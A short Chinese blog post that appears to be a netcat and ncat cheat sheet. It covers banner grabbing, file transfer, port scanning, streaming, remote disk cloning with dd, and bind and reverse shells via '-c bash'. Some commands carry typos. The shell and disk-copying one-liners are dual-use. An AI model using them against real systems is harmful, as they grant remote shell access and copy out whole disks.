一个假猪套神器:NET CAT-NC

  引:NAT CAT有”瑞士军刀“的美称,支持跨平台的使用。

  •   小身材,大智慧
  •   侦听模式/传输模式
  •   telnet/获取banner信息
  •   传输文本信息
  •   传输文件/目录
  •   加密传输文件
  •   远程控制/木马
  •   加密所有流量
  •   流媒体服务器
  •   远程克隆硬盘

  

 

  NC TELNET /BANNER :

  •   nc -nv 1.1.1.1 80 
  •   nc -nv 1.1.1.1 25
  •   nc -nv 1.1.1.1 110

  NC 传输文件/目录:

    传输文件

  • A:nc -lp 333>1.mp4
  • B:nc -nv IP 端口<1.mp4 -q 1(传递连接完毕后1秒断开)
  • A:nc -q l -lp 333 <a.mp4
  • B:nc -nv 1.1.1.1 333>2.mp4

    传输目录

  • A:tar -cvf -music/ | nc -lp 333 -q 1
  • B:nc -nv IP 端口 | tar -xvf -

    加密传文件

  • A: nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256-m ecb >1.mp4
  • B: mcrypt --flush -Fbq -a rijindael-256 -m ecb <a.mp4 | nc -nv IP 端口 -q 1

    NC-流媒体服务

  • A:cat 1.mp4 | nc -lp 333
  • B: IP 端口 | mplayer -vo x11 -cache 3000 -

    NC 端口扫描

  • nc -nvz ip 端口范围(TCP协议)
  • nc -nvzu ip 端口范围(UDP协议)

    NC 远程克隆硬盘

  • A: nc lp 333 | dd of= /dev/sda
  • B: dd if=/dev/sda | nc -nv IP 端口 -q 1
  • 远程电子取证,可以将目标服务器硬盘远程复制,或者内存。

    NC 远程控制

  PS:建立连接后可以实现双向的控制(服务器端与控制端)。

正向连接:

  •   A:nc -lp 333 -c bash 
  •   B:nc ip 端口

反向连接:

  • A: nc -lp 333
  • B:nc ip 端口 -c(连接建立后生成一个shell) bash

    NC:NCAT

  • NC缺乏加密与验证能力
  • NCat包含于Nmap工具中
  • A: ncat ncat -c bash -allow IP -vnl 端口 --ssl
  • B:ncat -nv IP 端口 -ssl
  • 不同系统/平台的NC参数功能不一定全部相同
posted @ 2017-11-05 18:55  AdminKen  阅读(835)  评论(0编辑  收藏  举报